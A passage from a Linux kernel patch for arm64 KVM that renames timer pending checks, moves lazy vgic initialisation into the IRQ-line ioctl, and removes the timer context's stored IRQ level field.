 void kvm_timer_vcpu_put(struct kvm_vcpu *vcpu)
@@ -983,7 +983,7 @@ static void unmask_vtimer_irq_user(struct kvm_vcpu *vcpu)
 {
 	struct arch_timer_context *vtimer = vcpu_vtimer(vcpu);
 
-	if (!kvm_timer_should_fire(vtimer)) {
+	if (!kvm_timer_pending(vtimer)) {
 		kvm_timer_update_irq(vcpu, false, vtimer);
 		if (static_branch_likely(&has_gic_active_state))
 			set_timer_irq_phys_active(vtimer, false);
@@ -1530,7 +1530,7 @@ static bool kvm_arch_timer_get_input_level(int vintid)
 
 		ctx = vcpu_get_timer(vcpu, i);
 		if (timer_irq(ctx) == vintid)
-			return kvm_timer_should_fire(ctx);
+			return kvm_timer_pending(ctx);
 	}
 
 	/* A timer IRQ has fired, but no matching timer was found? */
diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
index 410ffd41fd73a..2faa6d1dd01fa 100644
--- a/arch/arm64/kvm/arm.c
+++ b/arch/arm64/kvm/arm.c
@@ -46,6 +46,7 @@
 #include <kvm/arm_pmu.h>
 #include <kvm/arm_psci.h>
 
+#include "vgic/vgic.h"
 #include "sys_regs.h"
 
 static enum kvm_mode kvm_mode = KVM_MODE_DEFAULT;
@@ -1451,6 +1452,12 @@ int kvm_vm_ioctl_irq_line(struct kvm *kvm, struct kvm_irq_level *irq_level,
 
 	trace_kvm_irq_line(irq_type, vcpu_id, irq_num, irq_level->level);
 
+	if (irqchip_in_kernel(kvm)) {
+		int ret = vgic_lazy_init(kvm);
+		if (ret)
+			return ret;
+	}
+
 	switch (irq_type) {
 	case KVM_ARM_IRQ_TYPE_CPU:
 		if (irqchip_in_kernel(kvm))
diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
index e22b79cfff965..9acf44124ac89 100644
--- a/arch/arm64/kvm/vgic/vgic.c
+++ b/arch/arm64/kvm/vgic/vgic.c
@@ -515,11 +515,9 @@ int kvm_vgic_inject_irq(struct kvm *kvm, struct kvm_vcpu *vcpu,
 {
 	struct vgic_irq *irq;
 	unsigned long flags;
-	int ret;
 
-	ret = vgic_lazy_init(kvm);
-	if (ret)
-		return ret;
+	if (unlikely(!vgic_initialized(kvm)))
+		return 0;
 
 	if (!vcpu && intid < VGIC_NR_PRIVATE_IRQS)
 		return -EINVAL;
diff --git a/include/kvm/arm_arch_timer.h b/include/kvm/arm_arch_timer.h
index 7310841f45121..49c083c649425 100644
--- a/include/kvm/arm_arch_timer.h
+++ b/include/kvm/arm_arch_timer.h
@@ -64,11 +64,6 @@ struct arch_timer_context {
 	 */
 	bool				loaded;
 
-	/* Output level of the timer IRQ */
-	struct {
-		bool			level;
-	} irq;
-
 	/* Who am I? */
 	enum kvm_arch_timers		timer_id;
 
-- 
2.47.3

-- 
Without deviation from the norm, progress is not possible.